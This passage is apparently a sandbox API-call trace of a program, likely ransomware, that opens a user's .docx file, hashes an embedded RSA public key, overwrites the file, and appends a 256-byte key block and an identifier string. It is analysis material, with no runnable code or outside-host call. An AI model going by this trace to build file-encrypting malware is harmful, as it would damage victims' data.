hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.221] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.225] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x208b70a0, ftCreationTime.dwHighDateTime=0x1d89c22, ftLastAccessTime.dwLowDateTime=0x961e6050, ftLastAccessTime.dwHighDateTime=0x1d8a084, ftLastWriteTime.dwLowDateTime=0x961e6050, ftLastWriteTime.dwHighDateTime=0x1d8a084, nFileSizeHigh=0x0, nFileSizeLow=0xb3ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3Lz_J5_6ki.docx", cAlternateFileName="3LZ_J5~1.DOC")) returned 1 [0193.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95728 [0193.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95728 | out: hHeap=0x620000) returned 1 [0193.225] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\3Lz_J5_6ki.docx") returned=".docx" [0193.225] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\3Lz_J5_6ki.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\3lz_j5_6ki.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.227] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=45995) returned 1 [0193.227] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.229] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xb385, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.230] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.232] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.233] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xb3ab, lpOverlapped=0x0) returned 1 [0193.233] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.234] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.235] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.235] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.235] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.235] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.235] GetLastError () returned 0x0 [0193.235] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.235] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.236] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.236] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.236] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb3b0) returned 0x2ea79b0 [0193.236] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95728 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95770 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.237] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937b0 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93798 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0193.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.240] GetCurrentThreadId () returned 0x66c [0193.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ede0 [0193.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.241] GetCurrentThreadId () returned 0x66c [0193.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937b0 [0193.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0193.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93810 [0193.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937c8 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93798 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0193.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95770 | out: hHeap=0x620000) returned 1 [0193.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.252] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xb3a6, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xb3a6, lpOverlapped=0x0) returned 1 [0193.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.253] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xb3ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.253] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.254] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 